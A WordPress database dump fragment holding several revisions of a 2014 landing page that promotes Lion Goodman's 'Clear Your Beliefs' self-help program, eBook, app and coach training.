INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1785, 2, '2014-11-18 20:09:18', '2014-11-19 01:09:18', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 20:09:18', '2014-11-19 01:09:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1786, 2, '2014-11-18 23:49:02', '2014-11-19 04:49:02', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 23:49:02', '2014-11-19 04:49:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1787, 2, '2014-11-19 00:34:28', '2014-11-19 05:34:28', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-19 00:34:28', '2014-11-19 05:34:28', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1793, 2, '2014-11-19 20:54:37', '2014-11-20 01:54:37', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and\nNegative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman\n&nbsp;', 'NewCYB', '', 'publish', 'closed', 'open', '', 'newcyb', '', '', '2014-11-20 19:28:24', '2014-11-21 00:28:24', '', 0, 'http://clearyourbeliefs.com/?page_id=1793', 0, 'page', '', 0),
(1794, 2, '2014-11-19 20:54:37', '2014-11-20 01:54:37', '', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 20:54:37', '2014-11-20 01:54:37', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1797, 2, '2014-11-19 21:07:35', '2014-11-20 02:07:35', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:07:35', '2014-11-20 02:07:35', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1798, 2, '2014-11-19 21:39:54', '2014-11-20 02:39:54', '', '307601254', '', 'inherit', 'closed', 'open', '', '307601254', '', '', '2014-11-19 21:39:54', '2014-11-20 02:39:54', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4', 0, 'attachment', 'video/mp4', 0),
(1803, 2, '2014-11-19 21:52:13', '2014-11-20 02:52:13', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:52:13', '2014-11-20 02:52:13', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1804, 2, '2014-11-19 21:53:14', '2014-11-20 02:53:14', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:53:14', '2014-11-20 02:53:14', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1815, 2, '2014-11-19 23:40:47', '2014-11-20 04:40:47', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, 